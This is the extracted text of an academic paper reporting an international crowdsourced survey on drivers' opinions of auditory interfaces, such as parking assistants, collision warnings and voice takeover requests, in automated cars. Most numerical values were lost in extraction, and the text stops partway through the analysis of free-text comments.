dan stowell additional information and declarations can be found on page doi . /peerj-cs. copyright bazilinskyy and de winter distributed under creative commons cc-by . open access auditory interfaces in automated driving: an international survey pavlo bazilinskyy and joost de winter department of biomechanical engineering, faculty of mechanical, maritime and materials engineering, delft university of technology, delft, the netherlands abstract this study investigated peoples’ opinion on auditory interfaces in contemporary cars and their willingness to be exposed to auditory feedback in automated driving. we used an internet-based survey to collect , responses from countries. the respondents stated their attitudes towards two existing auditory driver assistance systems, a parking assistant (pa) and a forward collision warning system (fcws), as well as towards a futuristic augmented sound system (fs) proposed for fully automated driving. the respondents were positive towards the pa and fcws, and rated the willingness to have automated versions of these systems as . and . , respectively (on a scale from = disagree strongly to = agree strongly). the re- spondents tolerated the fs (the mean willingness to use it was . on the same scale). the results showed that among the available response options, the female voice was the most preferred feedback type for takeover requests in highly automated driving, regardless of whether the respondents’ country was english speaking or not. the present results could be useful for designers of automated vehicles and other stakeholders. subjects human-computer interaction, autonomous systems, multimedia keywords driverless car, crowdsourcing, survey, questionnaire, fully automated driving, highly automated driving, auditory interface, auditory feedback, warning introduction the development of automated driving systems the development of automated driving technology is a key topic in modern transportation research. a transition to automated driving may have a large positive influence on society (european commision, ). each year more than , , fatal accidents occur on roads worldwide, with the lower-income countries being overrepresented (gururaj, ; world health organization, ). if automated driving systems are designed to be fully capable and reliable, a very large portion of—yet probably not all—road traffic accidents could be prevented (goodall, ). furthermore, traffic congestions, gas emissions, and fuel consumption may reduce considerably thanks to automated driving systems. the control of vehicles can be represented as a spectrum consisting of five levels: ( ) manual driving, ( ) driver assistance, ( ) partially automated driving, ( ) highly automated driving, and ( ) fully automated driving (gasser & westhoff, ). the in- troduction of driver assistance systems to the public took place in the s with the release how to cite this article bazilinskyy and de winter ( ), auditory interfaces in automated driving: an international survey. peerj comput. sci. :e ; doi . /peerj-cs. mailto:p.bazilinskyy@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of adaptive cruise control (acc), a system that automates the longitudinal motion of the vehicle (beiker, ). advancements in cameras, radars, lasers, and artificial intelligence have led to the creation of systems that make partially automated driving possible. partially automated driving systems not only control the longitudinal motion of a vehicle, but also its lateral motion. examples of such systems are bmw’s traffic jam assistant (bmw, ), volvo’s acc with steer assist (volvo, a), and mercedes’ distronic plus with steering assist (daimler, ). in partially automated driving, drivers are usually required to keep their eyes focused on the road and intermittently touch the steering wheel. highly automated driving (had) is a next step. in had, the human can release the hands from the steering wheel and is no longer required to monitor the road permanently (e.g., banks, stanton & harvey, ). however, humans still have an important role in the control of highly automated vehicles (alicandri & moyer, ; dingus, hulse & barfield, ; levitan, golembiewski & bloomfield, ). in had, drivers can be asked to take over control of the vehicle when required, for example, when the vehicle automation cannot solve a task in a demanding traffic environment. the time between issuing a ‘takeover request’ and the required moment of transition of control from the vehicle to the human is a critical design parameter (gold et al., ). if the driver spends too much time on reclaiming the control of the vehicle, or if the driver does not comprehend the warning signal sent by the vehicle, an accident may result. clearly, the design of appropriate feedback is essential for the successful introduction of had to the public roads. indeed, inappropriate feedback is regarded as a primary cause of automation-induced accidents (norman, ). fully automated driving (fad) will be the next and final iteration in automated driving. people have been envisioning this step in the development of transportation for a long time. almost half a millennium ago, leonardo da vinci envisioned a pre-programmed clockwork cart (weber, ). in during the new york world’s fair, general motors presented their vision of the world years into the future ( – ). in their futurama exhibition, they introduced a concept of automated highways with trench-like lanes for separating traffic (wetmore, ). in , the futurist isaac asimov wrote a short story ‘sally’ that pictured a situation where only cars that did not require a human driver were allowed on the roads. fad offers numerous potential benefits. it could reduce stress and allow the operator to engage in non-driving tasks such as working, using in-vehicle entertainment, or resting (e.g., jamson et al., ; llaneras, salinger & green, ). furthermore, fad is a recommended solution for achieving an optimal traffic flow, for example by means of platooning on highways (bergenhem et al., ; varaiya, ). the google driverless car is one of the existing prototypes of fad (markoff, ). however, this particular vehicle does not fully comply with the principles of fad; in reality, the google driverless car relies on accurate three-dimensional maps of the environment and currently cannot cope with all dynamic environments of high complexity. it requires considerable advances in sensing and artificial intelligence before fad becomes practically feasible on all public roads. continental, a leading german manufacturer specialising on components for automotive bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. industry, predicts that fad will be launched in the year (continental, ), whereas some voices have argued that fad will never happen (gomes, ; underwood, ; yoshida, ). although automated driving systems are expected to improve safety, certain side effects may occur regarding the human factor (e.g., bainbridge, ; desmond, hancock & monette, ; merat et al., ; brandenburg & skottke, ). a degraded reaction time to critical events has been found among drivers exposed to acc (stanton, young & mccaulder, ; stanton et al., ; rudin-brown & parker, ; larsson, kircher & hultgren, ), and this issue is likely to be aggravated in higher levels of automated driving (de winter et al., ; strand et al., ). furthermore, it is expected that people who will be driving highly and fully automated cars will suffer from a reduction of their manual control skills, similar to pilots in highly automated airplanes (ebbatson, ; scallen, hancock & duley, ). the development of effective feedback systems is considered important in supporting operator’s sustained attention, also called vigilance (heikoop et al., submitted for publication). auditory displays as mentioned above, unless the driving task is fully automated, an appropriate feedback system is required that warns and/or informs the human when automation mode changes are required. the present study investigated the potential of auditory feedback in automated driving. the auditory modality has several important characteristics: ( ) it is omnidirectional. that is, unlike visual cues, auditory cues can be received from any direction. this is especially important in automated driving, during which the driver may not be attending to the road and dashboard; ( ) the auditory sense can receive information at almost all times; ( ) sound is transient, that is, unlike visual information which can be continuously available, information passed in the form of sound is only available at that particular moment; ( ) although auditory cues may be masked by other sounds, humans have the ability to selectively focus on one sound when multiple streams of sound are available, also known as the cocktail party effect (bregman, ; cooke & ellis, ; hermann, hunt & neuhoff, ; wickens & hollands, ). an advantage of sound is that it is possible to use language, which may be more informative as compared to the information conveyed with haptic or visual interfaces. because of the aforementioned qualities of sound, auditory displays are used in a variety of applications, especially in those cases where the user needs to be alerted or where additional visual load has to be avoided. for example, the majority of present route navigation devices use voice and sound messages to give directions to their users (holland, morse & gedenryd, ), and flight crews use auditory signals to get informed about proximate aircraft or to obtain directional information (e.g., begault, ; bronkhorst, veltman & van breda, ). an auditory interface in combination with tactile feedback was suggested in a driving simulator study (ho, reed & spence, ) as an optimal warning system for collision avoidance. the auditory modality has potential not only as a warning method, but also for providing input to the machine (e.g., speech interfaces). bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. literature reviews (stanton & edworthy, ; barón & green, ) suggest that people drive ‘better’ (i.e., lower lane variation, steadier speed) when auditory interfaces are employed in a manually driven car. auditory feedback can be delivered as a pre-recorded voice or as an artificial sound warning/message. the term earcon refers to a brief auditory message (e.g., a tune or a sound of a bell) that represents a certain event or object. earcons have been introduced to desktop computers to complement visual icons (mynatt, ; belz, robinson & casali, ; hermann, hunt & neuhoff, ). previous research has shown that a female voice is favoured over a male voice in route navigation devices (large & burnett, ). however, national or cultural differences seem to exist, where in some cases, the male voice is preferred over the female voice. in , bmw supposedly had to recall its navigating system in germany because male drivers disliked the idea of following orders communicated via a female voice (takayama & nass, ), and apple recently added the option of a male voice to their voice control system siri (bosker, ). in a driving simulator study by jonsson & dahlbäck ( ), non-native speakers of english responded more accurately to route instructions provided by a female voice than to route instructions provided by a male voice. auditory systems in current vehicles: parking assistant and forward collision warning system modern vehicles often include systems that assist in driving and increase road safety. such systems support drivers by providing auditory/visual/haptic warning messages and by taking over control of some of the driving tasks. in the present survey, we investigated the opinion of people on two existing auditory systems: a parking assistant (pa) and a forward collision warning system (fcws). the first generations of pas were so-called parking sensors, which produce warning sounds (beeps) when the car gets too close to a nearby object while parking, using ultrasonic or electromagnetic sensors (bmw, ; toyota, ; volkswagen, ). some recent pa systems take over the positioning of the vehicle during parking, leaving the control of acceleration and deceleration to the driver (volkswagen, ). other pas take over control of the parking process entirely, as can be seen in the toyota prius and bmw x (bmw, ; toyota, ). a fcws is a system that provides a warning sound when a vehicle is rapidly approach- ing a vehicle in front. fcwss have the potential to prevent a large portion of rear-end collisions (jamson, lai & carsten, ; kingsley, ; kessler et al., ). if a potential accident is detected by the fcws, the system either gives a warning to the driver (honda, ) or engages in emergency braking and/or steers way from the object (volvo, b). most fcws detect vehicles with the help of computer vision (srinivasa, ; dagan et al., ), an approach that is used by companies like honda and bmw (bmw, ; volvo, b; honda, ) and/or radars (volvo, b; ford, ; honda, ; mercedes-benz, ). both approaches have limitations, and the system may not issue warnings or stop the vehicle in bad weather or in other situations where the sensors are obscured by external bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. factors. the introduction of vehicle-to-vehicle (v v) communication may increase the efficiency and capabilities of collision warning systems (e.g., miller & huang, ). eighty-eight percent of owners of volvo cars surveyed by braitman et al. ( ) reported always having the fcws turned on. it is expected that both pas and fcwss will remain in future partially and highly auto- mated vehicles. however, these technologies will become obsolete with the introduction of fad because both parking and collision avoidance will be handled without any input from the human driver. ‘augmented/spatial’ sound system for fully automated driving auditory warning signals will not be required in fad, because in fad the automation by definition takes care of all possible emergency conditions. this study proposes an experimental setup aimed at the three-dimensional augmentation of sound surrounding a vehicle, hereafter referred to as the ‘future system’ (fs), which could be used in fad for entertainment and comfort. three-dimensional sound is being developed as a means for providing feedback to humans (lumbreras, sánchez & barcia, ; garas, ; rozier, ; godinho, antónio & tadeu, ; dobler, haller & stampfl, ). our proposed fs filters out unwanted sounds (e.g., tire/engine noise coming from vehicles in the vicinity) and amplifies desired sounds (e.g., sound of birds singing in a park). we envision that such a system could be used in future fully automated vehicles. vehicles driving fully automatically have full control of the vehicle and must have reliable detection capabilities of the environment. drivers of such vehicles will not be required to pay attention to the processes that take place in the environment surrounding the car. hence, a spatial augmentation of sounds that a driver prefers to hear and simultaneous cancelation of unwanted sounds may enhance the pleasure of being engaged in fad. such system will probably have to be configurable: drivers must have the option to select which sounds they want to augment and which sounds they wish to filter out, as well as to adjust the volume of these sounds. the aim of the present survey study as mentioned above, feedback is important in had, especially regarding transitions of control. it is relevant for the development of automated driving systems to know what types of interfaces people want and need. because automated cars do not exist yet on the consumer market, it is impossible to test such research questions in an ecologically valid environment, except through driving simulator research. the present study was undertaken from a different point of view. we proceeded on the basis that respondents were asked to imagine automated driving scenarios. the aim of the present study was to investigate the opinion of people on two existing auditory displays (pa & fcws) as well as the augmented sound system ‘fs’. the respondents were asked to judge two qualities of the systems—helpfulness and annoyance—and state whether they would consider using automated versions of such systems in the future. in addition, we asked people to report their preferred type of feedback for takeover requests in had. statistical associations between self-reported driving style as measured with the driver behaviour bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. questionnaire (dbq), yearly mileage, number of accidents, and opinions of respondents on the qualities of the proposed systems were assessed. the hypothesis that people from non-english speaking countries prefer a female voice to a male voice in automated driving systems was also tested. additionally, the respondents were asked to provide their general thoughts on the concept of automated driving in a free-response question. finally, the respondents provided their opinion on the year of introduction of fully automated driving in their country of residence. results of these analyses were compared with findings from two previous surveys that asked questions related to other aspects of automated vehicles (de winter et al., ; kyriakidis, happee & de winter, ). methods survey a survey containing questions was developed with the online tool crowdflower (www. crowdflower.com). table shows the questions of the survey as well as the corresponding coding. the full survey is included in the supplemental information . the survey was targeted towards reasonably educated persons without knowledge of automated driving. a previous survey indicated that people who work on crowdflower-based surveys have mostly undergraduate degrees (kyriakidis, happee & de winter, ). the present survey introduced in plain language three levels of driving: manual driving, partially automated driving, and fully automated driving. manual driving was referred to as “normal (non automated) cars”. the explanation of partially driving was provided as follows: “imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). however, the automation cannot handle all possible situations, and you sometimes have to take over control”. respondents were asked to imagine fully automated driving as follows: “imagine a fully automated car (no steering wheel) that drives completely on its own with no manual interaction”. the survey contained questions on the person’s age, gender, driving frequency, mileage, and accident involvement. the questions asking participants to provide information on their driving style were based on the violations scale of the dbq, as used by de winter ( ). the respondents were asked to express their opinion on two currently existing systems and one proposed setup that could be used during fully automated driving. specifically, we asked respondents about ( ) a parking assistant (pa) in a manually driven car that produces warning sounds (beeps) when the car gets too close to a nearby object while parking, ( ) a forward collision warning system (fcws) in a manually driven car that provides a warning sound when a car is rapidly approaching another car in front, and ( ) a future augmented surround sound system in a fully automated vehicle (fs). the fs was described as follows: “now imagine that this fully automated car records what is happening outside and plays it via speakers inside the car, informing the occupants about the outside environment. in other words, those who sit in the car can hear what is happening outside bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table all survey items. variable question full question as reported in the survey used coding instr q have you read and understood the above instructions? = yes, = no gender q what is your gender? ( = female, = male) − = i prefer not to respond, = female, = male age q what is your age? positive integer value drivefreq q on average, how often did you drive a vehicle in the last months? − = i prefer not to respond, = never, = less than once a month, = once a month to once a week, = to days a week, = to days a week, = every day kmyear q about how many kilometres (miles) did you drive in the last months? − = i prefer not to respond, = , = – , , = , – , , = , – , , = , – , , = , – , , = , – , , = , – , , = , – , , = more than , nracc q how many accidents were you involved in when driving a car in the last years? (please include all accidents, regardless of how they were caused, how slight they were, or where they happened)? − = i prefer not to respond, = , = , = , = , = , = , = more than vangered q how often do you do the following?: becoming angered by a particular type of driver, and indicate your hostility by whatever means you can. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vmotorway q how often do you do the following? disregard- ing the speed limit on a motorway. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vresident q how often do you do the following? disregard- ing the speed limit on a residential road. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vfollowing q how often do you do the following? driving so close to the car in front that it would be difficult to stop in an emergency. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vrace q how often do you do the following? racing away from traffic lights with the intention of beating the driver next to you. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month (continued on next page) bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table (continued) variable question full question as reported in the survey used coding vhorn q how often do you do the following? sounding your horn to indicate your annoyance with another road user. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vphone q how often do you do the following? using a mobile phone without a hands free kit. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vmean n/a mean for q – numeric value papast q in the past month, did you drive a car with a parking assistant? − = i prefer not to respond, = i do not know, = no, = yes pahelp q a parking assistant is helpful. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly paannoy q a parking assistant is annoying. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly paopin q what do you think are the disadvantages of a parking assistant? textual response pafut q i would like to have a system in my car that can park the car automatically, just by pressing a button. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwspast q in the past month, did you drive a car with a forward collision warning system? − = i prefer not to respond, = i do not know, = no, = yes fcwshelp q a forward collision warning system is helpful. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwsannoy q a forward collision warning system is annoying. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwsfut q i would you like to have a system in my car that brakes automatically to avoid collisions (autonomous emergency braking). − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwsopin q what do you think are the disadvantages of a forward collision warning system? textual response fsannoy q i believe that this type of surround sound system would be annoying. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly (continued on next page) bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table (continued) variable question full question as reported in the survey used coding fsfut q i would prefer to use such a sound system instead of opening the window, when driving through a scenic place (for example, a national park). − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fsopin q what would be the advantages and the disad- vantages of such sound system? textual response torint q now imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). however, the automation cannot handle all possible situations, and you sometimes have to take over control. what type of warning signal would you like to receive in case manual take over is required? = warning sound: one beep, = warning sound: two beeps, = warning sound: horn sound, = warning sound: bell sound, = warning light, = visual warning message projected on windscreen ‘take over please’, = vibrations in your seat, = vibrations in your steering wheel, = vibrations in your seatbelt, = vibrations in the floor, = female voice: ‘take over please’, = male voice: ‘take over please’, = other, = none of the above torintot q if you answered ‘other’ in the previous question, please specify what type of warning signal you would like to receive in the described scenario. textual response facpref q i would prefer to drive in a fully automated car rather than a normal (non automated) car. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly yearauto q in which year do you think that most cars will be able to drive fully automatically in your country of residence? year comm q please provide any suggestions which could help engineers to build safe and enjoyable automated cars. textual response survtime survey time (derived from results generated by crowdflower) seconds even when their windows are closed. sound volume in such system could be adjusted; particular noise (for example sound coming from another vehicle) could be filtered out. such a system could, for example, be used during a leisure drive through a park on a hot day”. illustrations belonging to the three scenarios (i.e., pa, fcws, fs) were used in the survey (fig. ). no auditory examples were used. the illustrations were uploaded to a remote site in order to be embedded to the survey. supplemental information contains the xml code used to create the survey. if one wishes to add images to a crowdflower survey, the suggested method could be used. the respondents were asked to indicate disadvantages of the pa (q ) and fcws (q ) and to indicate advantages and disadvantages of the fs (q ) by means of textual bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure illustrations belonging to the three scenarios presented to the respondents. (a) parking assistant (pa); (b) forward collision warning system (fcws); (c) future system (fs). responses. the respondents also had the opportunity to indicate the preferred mode of feedback for receiving a takeover request (q & q ). in the last question (q ), they were asked to “provide any suggestions, which could help engineers to build safe and enjoyable automated cars”. giving a response to this last free-response question was optional. all examples of given comments shown in this article are direct quotes from the responses; no grammatical or syntactic errors were corrected. the respondents had to complete all questions (except q & q ), and each question had an i prefer not to respond response option. configuration of crowdflower in the instructions, the respondents were informed that they would need approximately min to complete the survey. the task expiration time was set to min. contributors from all countries were allowed to participate in the survey, in order to collect data from an as large and diverse population as possible. moreover, the lowest level of experience of contributors, ‘level contributors’, was selected. this level of experience accounts for % of completed work on crowdflower. as a result, the survey was available to a large number of workers, which allowed reaching a relatively diverse group of users of the platform. completing the survey more than once from the same ip address was allowed (note, however, that multiple responses from the same ip address were filtered out in our analyses, see results section). for the completion of the survey a payment of $ . was offered, and , responses were collected. the study was preceded by a pilot test with respondents. the pilot test did not lead to any changes in the survey, and these respondents were not included in the analysis. analyses descriptive statistics (i.e., mean, median, standard deviation, skewness, and number of responses) were calculated for each of the variables. the skewness was calculated as the third central moment divided by the cube of the standard deviation. a spearman correlation matrix among the variables was created. the first author manually performed the analysis of textual responses (q , q , q , q , & q ). crowdflower automatically provides the respondent’s country based on his/her ip address. we analysed the preferences of people from english speaking countries, as defined by the uk government (uk visas & immigration, : antigua and barbuda, australia, bahamas, barbados, belize, canada, dominica, grenada, ireland, jamaica, new zealand, saint lucia, trinidad and tobago, united kingdom, and the united states) versus bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. non-english speaking countries regarding the use of a male or female voice for supporting takeover requests during highly automated driving. supplemental information contains the matlab script used to analyse the data. ethics statement all data were collected anonymously. the research was approved by the human research ethics committee (hrec) of the delft university of technology. documented informed consent was obtained via a dedicated survey item asking whether the respondent had read and understood the survey instructions. results number of respondents and respondent satisfaction in total, , surveys were completed. the responses were gathered on september between : and : (cet). the survey received an overall satisfaction rating of . out of . . additionally, the respondents ranked clearness of the instructions as . / . , fairness of the questions as . / . , easiness of the survey as . / . , and the offered payment as . / . . data filtering the respondents who indicated they had not read the instructions (n = ), who indicated they were under and thereby did not adhere to the survey instructions (n = ), who chose the i prefer not to respond or i do not know options in one or more of the multiple choice questions (n = ), who indicated they never drive (n = ), or who indicated they drive km per year (n = ) were excluded from the analyses. since no limitations were applied on the number of responses that could be generated per ip address, some people completed the survey more than once. such behaviour was seen as an indication that these persons participated in the survey primarily because of monetary gain. thus, we applied a strict filter, and all data generated from non-unique ip addresses were removed (n = ). in total, surveys were removed, leaving , completed surveys for further analysis. for the question “in which year do you think that most cars will be able to drive fully automatically in your country of residence?”, non-numeric responses (e.g., a year complemented by words such as “maybe ”, or “never”) and answers before the year were excluded, leaving , numeric responses. analyses at the individual level the , respondents were from countries (all , responses were associated with countries). descriptive statistics for all variables are listed in table . the respondents took on average . min to complete the survey (sd = . min, median = . min). the supplemental information contains the entire spearman correlation matrix. the correlation coefficients between variables that related to questions about the pa, fcws, and fs (papast, pahelp, paannoy, pafut, fcwspast, fcwshelp, fcwsannoy, fcwsfut, fsannoy, & fsfut) on the one hand, and age, drivefreq, kmyear, nracc, the bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table descriptive statistics for the survey items (n = , ). the response option “i don’t know” was omitted for the variables papast and fcwspast. variable mean median sd skewness min max gender . . − . age . . . drivefreq . . − . kmyear . . . nracc . . . vangered . . . vmotorway . . . vresident . . . vfollowing . . . vrace . . . vhorn . . vphone . . . vmean . . . . . papast . . . pahelp . . − . paannoy . . . pafut . . − . fcwspast . . . fcwshelp . . − . fcwsannoy . . . fcwsfut . . − . fsannoy . . − . fsfut . . − . facpref . . − . yearauto , . , . . , , survtime . . . , dbq variables (vangered, vmotorway, vresident, vfollowing, vrace, vhorn, & vphone), yearauto, and survtime, on the other, were overall small, between − . and . . the respondents’ mean and median age were . and years, respectively. figure shows the distribution of the respondents in -year wide age groups. . % of the respondents were male ( men vs. women). the frequencies of the answers are provided in table . figure shows that the respondents expected most cars to be able to drive in fully automated mode in their countries of residence around , (median response), with a highly skewed distribution. the respondents were asked to provide their opinion on two characteristics of the pa and fcws systems, annoyance and helpfulness, and whether they would be willing to have automated versions of such systems in their own cars (q for the pa & q for the fcws), all questions on a scale from (disagree strongly) to (agree strongly). figure shows the results for these questions. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table frequencies of answers. variable gender drivefreq kmyear nracc vangered vmotorway vresident vfollowing vrace vhorn vphone papast pahelp paannoy pafut fcwspast , fcwshelp fcwsannoy fcwsfut fsannoy fsfut facpref figure distribution of the age of the respondents aged between and years. figure shows associations between the opinion of the respondents on annoyance and helpfulness of the pa and fcws and their age divided into -year wide bins. figure a shows that younger respondents found that both the pa (ρ = − . ,p = . ) and the fcws (ρ = − . ,p < . ) were more annoying, but these effects were weak. the bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure distribution of responses for the question: “in which year do you think that most cars will be able to drive fully automatically in your country of residence?” (q ). years were divided into -year-wide bins. figure opinion of the respondents on whether a pa and fcws are helpful and annoying, and whether they would like to have automated versions of such systems in their cars in the future. spearman correlation between the respondents’ age and the reported annoyance of the fs was weak as well (ρ = . ,p = . ). figure b shows that the perceived helpfulness of the fcws (ρ = . ,p < . ) slightly increased with age. people who found the pa annoying typically indicated that the fcws was also annoying (ρ = . , p < . ), and respondents who thought that the pa was helpful, considered the fcws to be helpful as well (ρ = . ,p < . ). figure shows the respondents’ opinion on the proposed future system. the respondents were asked whether they would find such a system annoying (q ) and whether they would prefer to use such a system instead of opening windows while driving in a fully automated car through a scenic place (q ). a large portion of the respondents was neutral in their responses: people chose the option neither agree nor disagree in q , and persons chose the same option in q . bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure opinion on the annoyance and helpfulness of the parking assistant (pa), forward collision warning system (fcws), and future system (fs). (a) opinion on the annoyance of the pa (q ), fcws (q ), and fs (q ) as a function of age; (b) opinion on the helpfulness of the pa (q ) and fcws (q ) as a function of age. age was divided into -year-wide bins. figure distribution of opinions on whether the proposed future system (fs) would be annoying (q ) and whether the respondents would prefer the system to opening windows in fully automated cars (q ). in q the respondents were asked to report on the types of feedback that they would like to be supported by in case of a takeover request during highly automated driving. the respondents were allowed to select multiple options. figure shows that a large number of people preferred auditory feedback provided by a female voice saying ‘take over please’ (n = ). the number of respondents who chose the option with the male voice was considerably lower (n = ). figure makes a distinction between the numbers of female bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure preference for particular takeover requests during highly automated driving. numbers of respondents who indicated a preference for a particular takeover request during highly automated driving in the question: “now imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). however, the automation cannot handle all possible situations, and you sometimes have to take over control. what type of warning signal would you like to receive in case manual take over is required?” (q ). each bar is supplemented by the corresponding ‘risk ratios’ of female respondents, calculated as the proportion of females who indicated this answer divided by the proportion of males who indicated this answer. if the risk ratio is greater than , females are overrepresented. conversely, if the risk ratio is smaller than , females are underrepresented. % confidence intervals are shown in parentheses. and male respondents. it is apparent that both female and male respondents preferred the female over the male voice. other types of auditory feedback were reported in the following order: two beeps (n = ), one beep (n = ), a bell sound (n = ), and a horn sound (n = ). the respondents indicated a high level of support for both visual signals offered in the question: a warning message projected on the windscreen ‘take over please’ (n = ) and a warning light (n = ). however, respondents showed a relatively low level of acceptance of the offered variations of a vibration interface: vibrations in the seat (n = ), vibrations in the steering wheel (n = ), vibrations in the seatbelt (n = ), and vibrations in the floor (n = ). furthermore, the results seem to suggest that female respondents were less likely than male respondents to prefer a female voice. figure shows the opinion of the respondents on the combinations of warning signals. the figure shows that most people (n = ) preferred a sound signal (i.e., one or two beeps, a horn, or bell) without additional information. a large number of people indicated that they would like to receive a combination of all four modalities (n = ) or the combination of a sound signal, a visual message, and a voice (n = ). cross-national differences in opinion for feedback for takeover requests next, we tested the hypothesis whether peoples’ preference for a female and male voice in supporting takeover requests in highly automated driving was different between english and non-english speaking countries. figure presents a scatter plot, showing the numbers bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure preference to combinations of types of signals for aiding takeover requests during highly automated driving (q ). all possible combinations are listed. hence, the total number of respondents adds up to , . figure numbers of respondents from english and non-english speaking countries who indicated a preference for a male and a female voice for a takeover request during highly automated driving (q ). the dashed line represents the ratio between the number of respondents who preferred a female voice and the number of respondents who preferred a male voice. the solid line is the line of unity. no labels are shown for countries with five or less respondents indicating a male voice, to support the clarity of the figure. country abbreviations are listed according to iso - alpha- . of respondents per country who indicated that they would like to receive a female or a male voice. the overall percentage of respondents who expressed preference for a female voice was % ( / , ), and the overall percentage of people who expressed preference for a male voice was % ( / , ). the corresponding percentages were % ( / ) and % ( / ) for english speaking countries, and they were % ( / , ) and % ( / , ) for non-english speaking countries. the differences between english speaking countries and non-english speaking countries were not statistically significant (female voice: rr = . , % ci [ . – . ]; male voice: rr = . , % ci [ . – . ]). bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. analyses of textual comments the respondents provided their feedback on the disadvantages of the pa in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were ignored. comments were processed before data filtering and were hence based on all , responses. . % of the respondents (n = ) provided negative feedback on the auditory interfaces in parking assistants. many people (n = ) indicated that pa systems were annoying, for example: “sound should not be too loud and annoying” and “i think it could be annoying especially when your focusing”. thirty-seven respondents pointed out that the pa used overly loud sounds. several answers to the question contained comments that the pa sounds can be distracting (n = ) and inaccurate (n = ). five respondents indicated that they would prefer feedback in other types of modalities, for example: “annoying, use something else instead of the constant loud beeping sounds” and “the sound, a voice message would be better”. five respondents indicated that the pa systems cannot be used by deaf people. the respondents indicated their opinion on the disadvantages of the fcws in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were not included in the analysis. sixteen respondents indicated that the auditory feedback used in fcws was annoying, for example: “this situation might come up too often so the warning sound may get annoying fast” and “the beeps might feel annoying”. next, the respondents were asked to comment on possible advantages and disadvantages of the fs in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were not included in the 